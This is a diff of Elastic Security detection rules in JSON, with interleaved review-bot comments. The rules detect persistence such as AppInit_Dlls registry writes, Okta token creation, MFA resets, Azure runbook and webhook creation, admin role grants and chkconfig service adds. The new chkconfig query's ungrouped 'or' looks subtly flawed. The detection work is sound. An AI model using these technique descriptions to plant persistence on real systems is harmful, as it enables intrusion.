@@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where\n registry.path : (\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\", \n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\", \n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", + "note": "", + "query": "registry where\n registry.path : (\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\",\n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\Program Files\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\",\n \"C:\\\\Program Files (x86)\\\\Commvault\\\\ContentStore*\\\\Base\\\\cvd.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d0e159cf-73e9-40d1-a9ed-077e3158a855", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need 
to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_application_added_to_google_workspace_domain.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_application_added_to_google_workspace_domain.json new file mode 100644 index 0000000000000..16e33833cdc5c --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_application_added_to_google_workspace_domain.json 
@@ -0,0 +1,78 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a Google marketplace application is added to the Google Workspace domain. An adversary may add a malicious application to an organization\u2019s Google Workspace domain in order to maintain a presence in their target\u2019s organization and steal data.", + "false_positives": [ + "Applications can be added to a Google Workspace domain by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Application Added to Google Workspace Domain", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", + "references": [ + "https://support.google.com/a/answer/6328701?hl=en#" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "785a404b-75aa-4ffd-8be5-3334a5a544dd", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 14 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json index 02cc638a7ce0d..6471b1ddef70b 100644 
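Review bot: The event-lag guidance in `note` (polling interval of the Filebeat module, the `var.interval` default, the 130m lookback) is configuration text, which the rest of this commit moves out of `note` and into `setup`, yet `setup` here carries only the generic integration sentence. Moving those bullets into `setup` would keep this rule consistent with the others and leave `note` for triage guidance. `"version": 14` on a file created by this commit presumably carries over from the rule's earlier filename; if it is a genuinely new rule, it should start at version 1.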
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_create_okta_api_token.json
@@ -13,14 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Create Okta API Token",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:system.api_token.create\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "96b9f4ea-0e8c-435b-8d53-2096e75fcac5",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -49,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json
index 29d604a2953ba..8cba9d288ed5c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_deactivate_mfa_for_okta_user_account.json
@@ -13,14 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Deactivate MFA for an Okta User Account",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.mfa.factor.deactivate\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "cd89602e-9db0-48e3-9391-ae3bf241acd8",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -49,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json
index 2a2f5acfcc114..a64622fdf188b 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json
@@ -13,14 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Reset MFA Factors for an Okta User Account",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.mfa.factor.reset_all\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "729aa18d-06a6-41c7-b175-b65b739b1181",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -49,5 +68,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json
index bdae2f42bd04e..cda6d53e906d0 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_account_created.json
@@ -11,7 +11,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Automation Account Created",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE\" and event.outcome:(Success or success)\n",
 "references": [
 "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor",
@@ -19,8 +19,33 @@
 "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a",
 "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "df26fd74-1baa-4479-b42e-48da84642330",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -64,5 +89,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json
index 0c6a82d37701b..399ba22052ea7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_runbook_created_or_modified.json
@@ -11,7 +11,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Automation Runbook Created or Modified",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION\"\n ) and\n event.outcome:(Success or success)\n",
 "references": [
 "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor",
@@ -19,8 +19,33 @@
 "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a",
 "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "16280f1e-57e6-4242-aa21-bb4d16f13b2f",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -32,5 +57,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json
index 2b8110b8e7d54..1dae98188ea70 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_automation_webhook_created.json
@@ -11,7 +11,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Automation Webhook Created",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/ACTION\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE\"\n ) and\n event.outcome:(Success or success)\n",
 "references": [
 "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor",
@@ -19,8 +19,33 @@
 "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a",
 "https://www.ciraltos.com/webhooks-and-azure-automation-runbooks/"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -32,5 +57,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json
index 5ef30a8086887..5ddd859779bc2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_conditional_access_policy_modified.json
@@ -11,13 +11,42 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Conditional Access Policy Modified",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:(azure.activitylogs or azure.auditlogs) and\nevent.action:\"Update conditional access policy\" and event.outcome:(Success or success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ },
+ {
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "bc48bba7-4a23-4232-b551-eca3ca1e3f20",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -46,5 +75,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json
index 4b22ab50a41aa..8f7c2e8225c6c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_global_administrator_role_assigned.json
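Review bot: The second `related_integrations` entry, `{ "package": "azure", "version": "0.12.0" }`, has no `integration` field while the first names `activitylogs`; as the query matches `event.dataset:(azure.activitylogs or azure.auditlogs)`, the bare entry presumably stands for the audit-log data stream. If the exporter can express it, `"integration": "auditlogs"` would make that mapping explicit so the UI links the right integration and the two entries are not read as a duplicate; if the `azure` package exposes no such sub-integration, a bare package entry is the intended form and this can stand. The Azure AD Global Administrator hunk below has the same bare `azure` entry for an `azure.auditlogs` query.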
@@ -11,13 +11,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure AD Global Administrator Role Assigned", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\nazure.auditlogs.operation_name:\"Add member to role\" and\nazure.auditlogs.properties.target_resources.0.modified_properties.1.new_value:\"\\\"Global Administrator\\\"\"\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "04c5a96f-19c5-44fd-9571-a0b033f9086f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,7 +72,7 @@ "subtechnique": [ { "id": "T1098.003", - "name": "Add Office 365 Global Administrator Role", + "name": "Additional Cloud Roles", "reference": "https://attack.mitre.org/techniques/T1098/003/" } ] @@ -53,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
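Review bot: The new `required_fields` entry for `azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value` carries `"type": "unknown"`, which presumably means the generator found no mapping for that path in the azure package — consistent with it being a fixed positional index into two arrays rather than a declared field. That leaves the rule dependent on the ordering of `target_resources` and `modified_properties` in each event, and nothing in the rule says so. A short `setup` addition such as `Requires azure.auditlogs events where target_resources and modified_properties keep their original array order; the query reads positions 0 and 1.` would make the dependency explicit until the query can use a wildcard path like the PIM rule's `target_resources.*.display_name`. The query line itself is unchanged context here.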
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json index 4ee9f8074985b..5e250c030ff58 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_pim_user_added_global_admin.json 
@@ -13,13 +13,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Global Administrator Role Addition to PIM User", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\n azure.auditlogs.operation_name:(\"Add eligible member to role in PIM completed (permanent)\" or\n \"Add member to role in PIM completed (timebound)\") and\n azure.auditlogs.properties.target_resources.*.display_name:\"Global Administrator\" and\n event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.target_resources.*.display_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -48,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json index 214100ffced5c..781dd064087ad 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_azure_privileged_identity_management_role_modified.json 
@@ -11,14 +11,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Privilege Identity Management Role Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Azure Privilege Identity Management Role Modified\n\nAzure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and\nmonitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles\nsuch as Global Administrator and Application Administrator. \n\nThis rule identifies the update of PIM role settings, which can indicate that an attacker has already gained enough\naccess to modify role assignment settings. \n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Consider the source IP address and geolocation for the user who issued the command. Do they look normal for the user?\n- Consider the time of day. 
If the user is a human, not a program or script, did the activity take place during a normal\ntime of day?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this activity didn't follow your organization's change management policies, it should be reviewed by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Restore the PIM roles to the desired state.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Update role setting in PIM\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-resource-roles-assign-roles", "https://docs.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-configure" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7882cebf-6cf1-4de3-9662-213aa13e8b80", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
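Review bot: Two of the new `note` paragraphs end with a space before the newline (`Application Administrator. \n\n` and `role assignment settings. \n\n`); trailing whitespace inside the markdown is invisible when rendered but will keep resurfacing as diff noise on every regeneration of the rule file. The `### Investigating Azure Privilege Identity Management Role Modified` header mirrors the rule name's `Privilege`, while the body correctly says `Privileged Identity Management (PIM)`; if the name is ever corrected the header needs the same edit, so it may be worth flagging in the rule's own description.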
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_chkconfig_service_add.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_chkconfig_service_add.json new file mode 100644 index 0000000000000..f50fd5bf88b0b --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_chkconfig_service_add.json 
@@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Chkconfig Service Add", + "query": "process where event.type == \"start\" and \n (process.executable : \"/usr/sbin/chkconfig\" and process.args : \"--add\") or \n (process.args : \"*chkconfig\" and process.args : \"--add\")\n", + "references": [ + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 74, + "rule_id": "b910f25a-2d44-47f2-a873-aabdc0d355e6", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Lightning Framework" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization 